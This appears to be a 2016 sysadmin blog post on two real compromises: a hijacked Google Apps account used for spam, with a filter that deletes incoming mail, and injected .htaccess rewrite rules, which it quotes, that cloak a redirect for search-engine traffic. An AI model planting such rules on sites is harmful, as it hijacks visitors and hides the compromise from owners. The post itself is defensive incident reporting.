January 2016
« Nov   Feb »

Funny hacks which observed recently

I had two incidents those are reporting some malfunction with their platform. The best one which I found that a Google App account hack.

Incident A

Once customer complaint that he does NOT receiving any emails on his Google account even though he could able to login and send emails from the web interface without any issues. You may pls note he is taking about Google email account. What do you thinking now ??? Are you a Gmail holder and experienced something similar.

As a Google Apps Admin, I had checked the google apps email by using another user account and found no issues. I did also send one email to the customer who complaining the issue. Finally I had reset his account password and try some email to this email address. I did not receive any emails yet. Strange .. very strange !!! I could not blame Google for this issue and do not have any thoughts of Google smtp are bad one. Can you guess what will be the issues ? ….. I’m starting checking his all the inboxes … finally …. I observed that his trash box has recent emails.. Great !! :- this was the gear up of having more thoughts on the issues..

Core issue
1. His email address was compermised and was been used simple password like name123456 as password.
2. His email account has been used for sending bulk emails. But user do not know thing activity because he does not reeving any failure delivery emails.
3. The hacker set a Google filter for deleting any emails which coming towards his INBOX.
4. Everything seems normal when a user accessing the gmail.

It’s a simple hacking but from a genious brain which I called Operator hacking.


Incident B

The second thing was about .htaccess

When a user access the site from Google search engine, they got redirected to another porn site link. But when we access the site directly, there will not be any issue. I had asked a Dev team to checkout the application source code for the changes as they are using php scripts. They responded with no code was modified in files. So I had a false thoughts that if the site was compromised, hackers can submit wrong sitemap url and Google using that url for this redirection.

One of the dev team found that issue of redirection. The hacker put some additional mod_rewrite rules for redirecting site only which come any SEO reference and put one additional file.

RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ baritone-crossable.php?$1 [L]

He does not crack anything on the existing site and user does not having any issue.

For both two scenarios, We can learn a common fact is neither for the hackers did not make any disturbance on existing platform (Google account and SEO redirection) but they gain the purpose of making marketing by using someone resources.

Leave a Reply

You can use these HTML tags

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>